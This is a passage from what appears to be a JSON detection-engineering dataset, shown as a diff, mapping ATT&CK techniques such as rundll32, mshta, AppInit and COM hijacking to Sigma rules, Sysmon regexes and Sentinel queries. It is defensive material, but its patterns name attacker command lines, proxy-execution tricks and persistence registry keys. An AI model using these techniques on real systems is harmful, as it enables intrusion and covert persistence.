This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1085", + "command_list": [ + "\\\\Windows\\\\.+\\\\rundll32.exevbscript|javascript|http|https|.dll" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\rundll32.exevbscript|javascript|http|https|.dll", + "source": "SysmonHunter - Rundll32", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Rundll32", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\rundll32.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "vbscript|javascript|http|https|.dll" + } + } + } + ] + }, + { + "Rules": "ET Open", + 
"SID": "2025725", + "Signature": "ET POLICY RunDll Request Over SMB - Likely Lateral Movement", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_parent_path contains \"\\\\rundll32.exe\"or process_path contains \"rundll32.exe\")", + "name": "Rundll32" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY RunDll Request Over SMB - Likely Lateral Movement", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Equation Group DLL_U Load", + "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "author": "Florian Roth", + "description": "Detects a specific tool and export used by EquationGroup", + "references": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", + "https://twitter.com/cyb3rops/status/972186477512839170" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": "*\\rundll32.exe", + "CommandLine": "*,dll_u" + }, + "selection2": { + "CommandLine": "* -export dll_u *" + }, + "condition": "1 of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "author": "Florian Roth", + "status": "experimental", + "description": "Detects Trojan loader acitivty as used by APT28", + "references": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", + "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", + "https://twitter.com/ClearskySec/status/960924755355369472" + ], + "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059", + 
"attack.defense_evasion", + "attack.t1085", + "car.2013-10-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "rundll32.exe %APPDATA%\\\\*.dat\",*", + "rundll32.exe %APPDATA%\\\\*.dll\",#1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "author": "@41thexplorer, Windows Defender ATP", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "references": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/" + ], + "tags": [ + "attack.execution", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*" + }, + "condition": "selection" + }, + "level": "high" + }, + { + "action": "global", + "title": "Unidentified Attacker November 2018", + "id": "7453575c-a747-40b9-839b-125a0aae324b", + "status": "stable", + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "references": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529" + ], + "author": "@41thexplorer, Windows Defender ATP", + "date": "2018/11/20", + "modified": "2018/12/11", + "tags": [ + "attack.execution", + "attack.t1085" + ], + "detection": { + "condition": "1 of them" + }, + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*cyzfc.dat, PointFunctionCall" + } + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection2": { + "EventID": 11, + "TargetFilename": [ + "*ds7002.lnk*" + ] + } + } + }, + { + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth", + "references": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100" + ], + "tags": [ + "attack.g0001", + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Command": [ + "rundll32.exe *,zxFunction*", + "rundll32.exe *,RemoteDiskXXXXX" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "status": "experimental", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth", + "date": "2017/06/03", + "references": [ + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + 
"https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\rundll32.exe *,InstallArcherSvc" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "status": "experimental", + "description": "Detects a rundll32 that communicates with public IP addresses", + "references": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100" + ], + "author": "Florian Roth", + "date": "2017/11/04", + "tags": [ + "attack.t1085", + "attack.defense_evasion", + "attack.execution" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Image": "*\\rundll32.exe", + "Initiated": "true" + }, + "filter": { + "DestinationIp": [ + "10.*", + "192.168.*", + "172.16.*", + "172.17.*", + "172.18.*", + "172.19.*", + "172.20.*", + "172.21.*", + "172.22.*", + "172.23.*", + "172.24.*", + "172.25.*", + "172.26.*", + "172.27.*", + "172.28.*", + "172.29.*", + "172.30.*", + "172.31.*", + "127.*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "level": "medium" + }, + { + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "status": "experimental", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth", + "date": 
"2017/04/15", + "references": [ + "https://twitter.com/rikvduijn/status/853251879320662017" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1073", + "attack.t1085", + "car.2013-10-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\System32\\control.exe", + "CommandLine": "*\\rundll32.exe *" + }, + "filter": { + "CommandLine": "*Shell32.dll*" + }, + "condition": "selection and not filter" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "description": "Detects suspicious process related to rundll32 based on arguments", + "status": "experimental", + "references": [ + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1085" + ], + "author": "juju4", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\rundll32.exe* url.dll,*OpenURL *", + "*\\rundll32.exe* url.dll,*OpenURLA *", + "*\\rundll32.exe* url.dll,*FileProtocolHandler *", + "*\\rundll32.exe* zipfldr.dll,*RouteTheCall *", + "*\\rundll32.exe* Shell32.dll,*Control_RunDLL *", + "*\\rundll32.exe javascript:*", + "* url.dll,*OpenURL *", + "* url.dll,*OpenURLA *", + "* url.dll,*FileProtocolHandler *", + "* zipfldr.dll,*RouteTheCall *", + "* Shell32.dll,*Control_RunDLL *", + "* javascript:*", + "*.RegisterXLL*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + { + 
"title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "status": "experimental", + "references": [ + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://twitter.com/cyb3rops/status/1186631731543236608" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1085" + ], + "author": "Florian Roth", + "date": "2019/10/22", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\rundll32.exe *,#*" + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows contol panel elements have been identified as source (mmc)" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.justice.gov/file/1080281/download", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + 
"https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1103", + "command_list": [ + "Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs|Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs" + ], + "commands": [ + { + "command": "Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs|Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs", + "source": "SysmonHunter - AppInit DLLs", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "AppInit DLLs", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs|Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Appinit_Dlls\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Appinit_Dlls\\\\\")", + "name": "AppInit DLLs" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1122", + "command_list": [ + "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32" + ], + "commands": [ + { + "command": "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32", + "source": "SysmonHunter - 
Component Object Model Hijacking", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Component Object Model Hijacking", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32", + "flag": "regex" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\Software\\\\Classes\\\\CLSID\\\\\"", + "name": "Component Object Model Hijacking" + } + ], + "possible_detections": [ + { + "title": "Windows Registry Persistence - COM key linking", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "status": "experimental", + "description": "Detects COM object hijacking via TreatAs subkey", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "author": "Kutepov Anton, oscd.community", + "date": "2019/10/23", + "modified": "2019/11/07", + "tags": [ + "attack.persistence", + "attack.t1122" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 12, + "TargetObject|startswith": "HKU\\", + "TargetObject|contains": "_Classes\\CLSID\\", + "TargetObject|endswith": "\\TreatAs" + }, + "condition": "selection" + }, + "falsepositives": [ + "Maybe some system utilities in rare cases use linking keys for backward compability" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "DLL monitoring" + ], + [ + "Loaded DLLs" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + 
"Sysmon - ID 7", + "DLL monitoring" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download" + ] + }, + { + "technique_id": "T1128", + "command_list": [ + "\\SOFTWARE\\Microsoft\\NetSh", + "\\\\Windows\\\\.+\\\\netsh.exeadd|helper" + ], + "commands": [ + { + "command": "\\SOFTWARE\\Microsoft\\NetSh", + "source": "SysmonHunter - Netsh Helper DLL", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\netsh.exeadd|helper", + "source": "SysmonHunter - Netsh Helper DLL", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Netsh Helper DLL", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SOFTWARE\\Microsoft\\NetSh" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\netsh.exe" + }, + "cmdline": { + "pattern": "add|helper", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"*\\\\SOFTWARE\\\\Microsoft\\\\Netsh\\\\*\"", + "name": "Narsh Helper DLL Registry" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"netsh.exe\"and process_command_line contains \"*helper*\")", + "name": "Netsh Helper DLL Process" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "DLL monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1131", + "command_list": [ + "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages" + ], + "commands": [ + { + "command": "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages", + "source": 
"SysmonHunter - Authentication Package", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Authentication Package", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"*\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\*\")and (process_path !contains \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\"or process_path !contains \"C:\\\\Windows\\\\system32\\\\svchost.exe\"or process_path !contains \"C:\\\\Windows\\\\system32\\\\services.exe\")", + "name": "Authentication Package" + } + ], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "DLL monitoring" + ], + [ + "DLL monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1170", + "command_list": [ + "\\\\windows\\\\.+\\\\mshta.exevbscript|javascript|http|https" + ], + "commands": [ + { + "command": "\\\\windows\\\\.+\\\\mshta.exevbscript|javascript|http|https", + "source": "SysmonHunter - Mshta", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Mshta", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\windows\\\\.+\\\\mshta.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "vbscript|javascript|http|https" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 11 or EventID == 15)and file_name contains 
\".hta\"", + "name": "MSHTA FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3and (process_command_line contains \"mshta.exe\"or process_parent_command_line contains \"mshta.exe\")", + "name": "MSHTA Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"mshta.exe\"or process_parent_command_line contains \"mshta.exe\")", + "name": "MSHTA Process" + } + ], + "possible_detections": [ + { + "title": "Baby Shark Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "experimental", + "description": "Detects activity that could be related to Baby Shark malware", + "references": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1086", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1170" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "author": "Florian Roth", + "date": "2019/02/24", + "detection": { + "selection": { + "CommandLine": [ + "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"", + "powershell.exe mshta.exe http*", + "cmd.exe /c taskkill /im cmd.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "MSHTA spwaned by SVCHOST as seen in LethalHTA", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "experimental", + "description": "Detects MSHTA.EXE spwaned by SVCHOST described in report", + "references": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1170" + ], + "author": "Markus Neis", + "date": "2018/06/07", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": 
"*\\svchost.exe", + "Image": "*\\mshta.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "MSHTA Spawning Windows Shell", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "experimental", + "description": "Detects a Windows command line executable started from MSHTA.", + "references": [ + "https://www.trustedsec.com/july-2015/malicious-htas/" + ], + "author": "Michael Haag", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\mshta.exe", + "Image": [ + "*\\cmd.exe", + "*\\powershell.exe", + "*\\wscript.exe", + "*\\cscript.exe", + "*\\sh.exe", + "*\\bash.exe", + "*\\reg.exe", + "*\\regsvr32.exe", + "*\\BITSADMIN*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1170", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" + ], + "falsepositives": [ + "Printer software / driver installations", + "HP software" + ], + "level": "high" + }, + { + "title": "Possible Applocker Bypass", + "id": "82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719", + "description": "Detects execution of executables that can be used to bypass Applocker whitelisting", + "status": "experimental", + "references": [ + "https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt", + "https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/" + ], + "author": "juju4", + "tags": [ + "attack.defense_evasion", + "attack.t1118", + "attack.t1121", + "attack.t1127", + "attack.t1170" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine|contains": [ + "\\msdt.exe", + "\\installutil.exe", + "\\regsvcs.exe", + "\\regasm.exe", + "\\msbuild.exe", + "\\ieexec.exe" + ] + }, + "condition": "selection" + 
}, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Using installutil to add features for .NET applications (primarly would occur in developer environments)" + ], + "level": "low" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "ID 1 & 7", + "Sysmon" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1180", + "command_list": [ + "Control Panel\\Desktop\\SCRNSAVE.EXE" + ], + "commands": [ + { + "command": "Control Panel\\Desktop\\SCRNSAVE.EXE", + "source": "SysmonHunter - Screensaver", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Screensaver", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Control Panel\\Desktop\\SCRNSAVE.EXE" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Control Panel\\Desktop\\SCRNSAVE.EXE" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"*\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE\")and (process_parent_command_line !contains \"explorer.exe\"or process_path !contains \"rundll32.exe\"or process_command_line !contains \"*shell32.dll,Control_RunDLL desk.cpl,ScreenSaver,*\")", + "name": "Screensaver" + } + ], + "possible_detections": [ + [ + "4688", 
+ "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1182", + "command_list": [ + "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs" + ], + "commands": [ + { + "command": "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs", + "source": "SysmonHunter - AppCert DLLs", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "AppCert DLLs", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls\\\\\"", + "name": "AppCert DLLs" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ] + }, + { + "technique_id": "T1183", + "command_list": [ + "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" + ], + 
"commands": [ + { + "command": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit", + "source": "SysmonHunter - Image File Execution Options Injection", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Image File Execution Options Injection", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\\"or registry_key_path contains \"\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\\")", + "name": "Image File Execution Options Injection" + } + ], + "possible_detections": [ + { + "title": "Registry Persistence Mechanisms", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "description": "Detects persistence registry keys", + "references": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "date": "2018/04/11", + "author": "Karneades", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_reg1": { + "EventID": 13, + "TargetObject": [ + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\GlobalFlag", + "*\\SOFTWARE\\Microsoft\\Windows 
